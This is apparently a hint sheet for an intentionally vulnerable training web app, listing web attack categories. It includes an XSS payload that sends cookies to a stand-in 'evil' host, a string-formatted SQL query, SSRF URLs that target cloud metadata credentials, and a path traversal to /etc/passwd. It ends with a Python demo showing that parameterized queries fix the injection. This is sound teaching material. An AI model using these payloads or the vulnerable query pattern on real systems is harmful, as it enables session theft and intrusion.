| Category | Notes |
|---|---|
| Injection | `sql = '''SELECT username FROM users WHERE username = '%s' and password = '%s' ''' % (username, password)` |
| Broken Authentication | Default credentials; bruteforce (Username: Administrator) |
| Cross-Site Scripting (XSS) | `<script>document.write('<img src="https://evil.lab.zdt.se/evilimage?get='+escape(document.cookie)+'">');</script>` |
| Security Misconfiguration | The SQL injection is fixed here; try anyway. |
| Broken Access Control | Check the user ID in the URL. |
| Broken Session | Flask does not encrypt cookie content, it only signs it. |
| Parameter Tampering | Add `"is_admin": true` to the JSON request body. |
| Cross-Site Request Forgery (CSRF) | Visit the evil contractor portal while logged into MDM to trigger a device wipe. |
| Cross-Origin Resource Sharing (CORS) | Visit the evil benefits portal while logged into MDM to steal sensitive device data via the API. |
| Path Traversal | Download `/etc/passwd`. |
| Server-Side Request Forgery (SSRF) | Login: user/user.<br>Demo URLs (safe, mocked responses):<br>AWS Metadata: `http://169.254.169.254/latest/meta-data/`<br>AWS Credentials: `http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole`<br>Internal Admin: `http://localhost/admin`<br>Secret File: `http://localhost/secrets/coca_cola_recipe.txt`<br>External Images: `http://evil.lab.zdt.se/[any-path]`<br>The image will appear broken for non-image content; check the Network tab to see the fetched data. |
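As an added example (not the lab's own code), the query pattern from the Injection row is shown beside a parameterized version, run against a constructed in-memory SQLite table. A legitimate username containing an apostrophe is enough to break the string-formatted query, while bound parameters handle it correctly; the table schema and sample users are assumptions for the demo.

```python
import sqlite3


def make_db():
    # Constructed in-memory table for the demo (not the lab's real schema).
    # Passwords are stored in clear text only to mirror the lab's query;
    # a real application stores password hashes.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "wonderland"), ("o'brien", "secret")],
    )
    return conn


def login_vulnerable(conn, username, password):
    # Same pattern as the Injection row: user input is formatted into the SQL text,
    # so any quote in the input changes the structure of the statement.
    sql = (
        "SELECT username FROM users WHERE username = '%s' and password = '%s'"
        % (username, password)
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    # Hardened form: values are bound as parameters and never become SQL text.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def compare(username, password):
    """Run both versions on the same input and report what each returned."""
    conn = make_db()
    try:
        vuln, vuln_error = login_vulnerable(conn, username, password), None
    except sqlite3.Error as exc:
        vuln, vuln_error = None, type(exc).__name__
    safe = login_parameterized(conn, username, password)
    return {"vulnerable": vuln, "vulnerable_error": vuln_error, "parameterized": safe}


if __name__ == "__main__":
    print(compare("alice", "wonderland"))
    print(compare("o'brien", "secret"))
```

The apostrophe case fails with an `OperationalError` in the formatted version, which is the same defect an attacker exploits; the parameterized version returns the matching row.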